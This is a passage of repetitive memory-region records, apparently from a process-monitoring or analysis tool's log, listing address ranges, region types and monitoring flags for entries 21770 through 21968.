region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21770 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21771 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21772 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21773 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21774 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21775 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21776 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21777 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21778 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21779 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21780 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21781 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21782 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21783 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21784 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21785 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21786 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21787 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21788 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21789 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21790 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21791 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21792 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21793 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21794 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21795 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21796 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21797 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21798 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21799 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21800 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21801 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21802 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21803 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21804 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21805 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21806 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21807 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21808 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21809 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21810 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21811 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21812 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21813 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21814 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21815 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21816 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21817 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21818 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21819 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21820 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21821 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21822 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21823 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21824 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21825 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21826 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21827 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21828 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21829 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21830 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21831 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21832 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21833 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21834 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21835 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21836 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21837 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21838 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21839 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21840 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21841 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21842 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21843 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21844 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21845 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21846 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21847 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21848 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21849 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21850 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21851 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21852 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21853 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21854 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21855 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21856 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21857 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21858 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21859 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21860 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21861 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21862 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21863 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21864 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21865 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21866 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21867 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21868 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21869 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21870 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21871 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21872 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21873 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21874 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21875 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21876 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21877 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21878 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21879 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21880 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21881 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21882 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21883 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21884 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21885 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21886 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21887 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21888 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21889 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21890 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21891 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21892 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21893 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21894 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21895 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21896 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21897 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21898 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21899 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21900 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21901 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21902 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21903 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21904 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21905 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21906 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21907 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21908 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21909 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21910 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21911 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21912 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21913 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21914 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21915 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21916 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21917 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21918 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21919 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21920 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21921 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21922 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21923 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21924 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21925 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21926 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21927 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21928 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21929 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21930 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21931 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21932 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21933 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21934 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21935 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21936 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21937 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21938 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21939 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21940 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21941 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21942 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21943 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21944 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21945 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21946 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21947 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21948 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21949 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21950 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21951 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21952 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21953 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21954 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21955 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21956 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21957 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21958 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21959 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21960 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21961 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21962 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21963 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21964 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21965 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21966 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21967 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21968 start_va = 0x570000 end_va = 0x57efff monitored = 1 